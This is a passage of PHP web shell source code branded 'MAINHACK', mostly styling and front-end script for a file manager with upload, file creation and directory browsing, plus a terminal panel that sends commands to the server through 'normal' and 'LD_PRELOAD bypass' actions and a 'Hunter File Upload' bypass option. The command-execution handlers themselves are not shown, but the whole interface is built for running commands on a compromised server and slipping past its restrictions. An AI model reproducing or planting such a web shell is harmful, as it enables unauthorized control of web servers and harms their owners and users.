display: flex;
justify-content: space-between;
align-items: center;
border-bottom: 1px solid #555;
padding-bottom: 10px;
margin-bottom: 15px;
}
.modal-header h2 {
margin: 0;
color: red;
}
.close-button {
color: #aaa;
font-size: 28px;
font-weight: bold;
cursor: pointer;
}
.close-button:hover,
.close-button:focus {
color: #fff;
text-decoration: none;
}
/* Terminal Content Styles */
.cmd-group {
display: flex;
margin-bottom: 10px;
}
.cmd-group input[type="text"] {
flex-grow: 1;
margin-right: 10px;
background: #444;
border: 1px solid #666;
color: #fff;
padding: 8px;
border-radius: 4px;
}
.cmd-group button {
padding: 8px 15px;
border: none;
cursor: pointer;
background-color: #555;
color: white;
border-radius: 4px;
transition: background-color 0.3s;
}
.cmd-group button:hover {
background-color: #777;
}
#cmd-output {
background: #111;
color: #0f0;
font-family: 'Courier New', Courier, monospace;
font-size: 14px;
padding: 10px;
margin-top: 10px;
height: 300px;
overflow: auto;
border: 1px solid #444;
border-radius: 4px;
white-space: pre-wrap;
word-wrap: break-word;
}
/* --- END: Improved and new styles --- */
</style>
<script>
// --- START: New JS for Modal ---
function openTerminal() {
document.getElementById('terminal-modal').style.display = 'block';
}
function closeTerminal() {
document.getElementById('terminal-modal').style.display = 'none';
}
window.onclick = function(event) {
const modal = document.getElementById('terminal-modal');
if (event.target == modal) {
modal.style.display = "none";
}
}
// --- END: New JS for Modal ---
function sendNormalCmd() {
var cmd = document.getElementById('cmd_normal_input').value;
if (!cmd) return false;
document.getElementById('cmd-output').textContent = 'Executing normal command...';
fetch('?action=cmd_normal', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({cmd: cmd})
})
.then(res => res.text())
.then(data => {
document.getElementById('cmd-output').textContent = data;
});
return false; // Prevent form submission
}
function sendBypassCmd() {
var cmd = document.getElementById('cmd_bypass_input').value;
if (!cmd) return false;
document.getElementById('cmd-output').textContent = 'Executing bypass command...';
fetch('?action=cmd_bypass', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({cmd: cmd})
})
.then(res => res.text())
.then(data => {
document.getElementById('cmd-output').textContent = data;
refresh_path(); // Refresh file list to see test.txt
});
return false; // Prevent form submission
}
</script>
</head>
<body>
<h1 class="mainhack-title">MAINHACK</h1>
<?php
$path = str_replace('\\', '/', $current_path);
$paths = explode('/', $path);
echo "<div class='wrapper' id='path_div'>";
foreach ($paths as $id => $pat) {
if ($id == 0 && $pat === '') {
echo '<a href="#" path="/" onclick="change_path(this)">/</a>';
}
if ($pat != '') {
$tmp_path = implode('/', array_slice($paths, 0, $id + 1));
if (empty($tmp_path)) $tmp_path = '/';
echo "<a href='#' path='$tmp_path' onclick='change_path(this)'>$pat/</a>";
}
}
echo "</div>";
// --- START: Terminal Modal HTML moved here ---
?>
<div id="terminal-modal" class="modal-overlay">
<div class="modal-content">
<div class="modal-header">
<h2>Terminal</h2>
<span class="close-button" onclick="closeTerminal()">×</span>
</div>
<div class="modal-body">
<form onsubmit="return sendNormalCmd();" class="cmd-group">
<input type="text" id="cmd_normal_input" placeholder="Normal Command (e.g., whoami, ls -la)" autocomplete="off" />
<button type="submit">Run Normal</button>
</form>
<form onsubmit="return sendBypassCmd();" class="cmd-group">
<input type="text" id="cmd_bypass_input" placeholder="Bypass Command (LD_PRELOAD)" autocomplete="off" />
<button type="submit">Run Bypass</button>
</form>
<div id="cmd-output-container">
<label style="color: #ccc;">Command Output:</label>
<pre id="cmd-output"></pre>
</div>
</div>
</div>
</div>
<?php
// --- END: Terminal Modal HTML ---
?>
</body>
</html>
<?php
}
function menu() {
?>
<div class="wrapper main-menu">
<form method="post" enctype="multipart/form-data" style="display: inline-block;" class="menu-item">
<div class="file-upload">
<label for="file-upload-input" style="cursor: pointer;">
[ Upload ]
</label>
<input type="file" id="file-upload-input" style="display: none;" onchange="handle_upload()" />
</div>
</form>
<a href='#' onclick='refresh_path()' class='menu-item white'>[ HOME ]</a>
<a href='#' onclick='create_file()' class='menu-item white'>[ Create File ]</a>
<a href='#' onclick='openTerminal()' class='terminal-item white'>[ Terminal ]</a>
</div>
<table cellspacing="0" cellpadding="7" width="100%">
<thead>
<tr>
<th width="44%"></th>
<th width="11%"></th>
<th width="17%"></th>
<th width="17%"></th>
<th width="11%"></th>
</tr>
</thead>
<tbody id="data_table" class='blur-table'>
<div class="wrapper" style='margin-top: -10px'>
<input type="checkbox" class='mr-10' id='bypass-upload'>[ Hunter File Upload ]</input>
</div>
</tbody>
</table>
<?php
}
?>